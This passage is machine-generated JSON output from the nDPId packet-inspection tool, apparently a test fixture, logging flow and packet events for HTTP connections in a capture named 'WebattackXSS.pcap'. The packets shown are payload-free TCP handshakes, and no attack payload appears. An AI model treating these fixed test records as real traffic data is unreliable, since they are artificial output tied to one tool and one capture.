-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347989526,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347989526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8S9BAAD4GegCsEAABwKgKMof2AFDafYYCAAAAAKACchCnLgAAAgQFtAQCCAoBPM3SAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":2,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh\/a7HZT72n2GA6AScSC0xwAAAgQFtAQCCAoD5p9GATzN0gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8480,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":3,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0S9FAAD4GegesEAABwKgKMof2AFDafYYDux2U\/IAQAOVTzgAAAQEICgE8zdMD5p9G"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347992139,"flow_last_seen":1499347992139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347992139,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1499347992139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"ABm5CmnxAMGxFOsxCABFAAA866dAAD4G2iisEAABwKgKMogQAFBfGDvHAAAAAKACchBqJwAAAgQFtAQCCAoBPNBgAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":2,"flow_last_seen":1499347992139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiBBHAQA0Xxg7yKAScSB+FgAAAgQFtAQCCAoD5qHUATzQYAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":3,"flow_last_seen":1499347992140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347992140,"pkt":"ABm5CmnxAMGxFOsxCABFAAA066hAAD4G2i+sEAABwKgKMogQAFBfGDvIRwEANYAQAOUdHgAAAQEICgE80GAD5qHU"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347993411,"flow_last_seen":1499347993411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347993411,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1499347993411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wWNAAD4GBG2sEAABwKgKMogeAFD5yRD9AAAAAKACchD48wAAAgQFtAQCCAoBPNGeAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":2,"flow_last_seen":1499347993411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiB6gRZIr+ckQ\/qAScSAgaQAAAgQFtAQCCAoD5qMSATzRngEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":3,"flow_last_seen":1499347993412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347993412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wWRAAD4GBHSsEAABwKgKMogeAFD5yRD+oEWSLIAQAOW\/cAAAAQEICgE80Z4D5qMS"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347994680,"flow_last_seen":1499347994680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347994680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1499347994680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eXlAAD4GTFesEAABwKgKMogsAFCPtauiAAAAAKACchDHFwAAAgQFtAQCCAoBPNLbAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":2,"flow_last_seen":1499347994680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiCwnn9QNj7Wro6AScSAkFAAAAgQFtAQCCAoD5qRPATzS2wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":3,"flow_last_seen":1499347994681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347994681,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eXpAAD4GTF6sEAABwKgKMogsAFCPtaujJ5\/UDoAQAOXDGwAAAQEICgE80tsD5qRP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347997344,"flow_last_seen":1499347997344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347997344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1499347997344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nDhAAD4GKZisEAABwKgKMohGAFAyaklNAAAAAKACchCEBAAAAgQFtAQCCAoBPNV1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":2,"flow_last_seen":1499347997344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiEaQGXl+MmpJTqAScSDQewAAAgQFtAQCCAoD5qbpATzVdQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":3,"flow_last_seen":1499347997345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347997345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nDlAAD4GKZ+sEAABwKgKMohGAFAyaklOkBl5f4AQAOVvgwAAAQEICgE81XUD5qbp"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347998605,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MQxAAD4GlMSsEAABwKgKMohUAFBMT+e8AAAAAKACchDKZgAAAgQFtAQCCAoBPNawAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":2,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiFT+qOY2TE\/nvaAScSA6WwAAAgQFtAQCCAoD5qgkATzWsAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":3,"flow_last_seen":1499347998606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347998606,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MQ1AAD4GlMusEAABwKgKMohUAFBMT+e9\/qjmN4AQAOXZYQAAAQEICgE81rED5qgk"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348001148,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348001148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pkpAAD4GH4asEAABwKgKMohuAFDUG39mAAAAAKACchCoWgAAAgQFtAQCCAoBPNksAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":2,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiG4I9+h41Bt\/Z6AScSAJQwAAAgQFtAQCCAoD5qqgATzZLAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8574,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":3,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pktAAD4GH42sEAABwKgKMohuAFDUG39nCPfoeYAQAOWoSgAAAQEICgE82SwD5qqg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348002450,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348002450,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ydAAD4G8qisEAABwKgKMoh8AFCQawlWAAAAAKACchBgyAAAAgQFtAQCCAoBPNpxAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":2,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiHx5OBm2kGsJV6AScSAe7QAAAgQFtAQCCAoD5qvlATzacQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":3,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00yhAAD4G8q+sEAABwKgKMoh8AFCQawlXeTgZt4AQAOW98wAAAQEICgE82nID5qvl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348003742,"flow_last_seen":1499348003742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348003742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
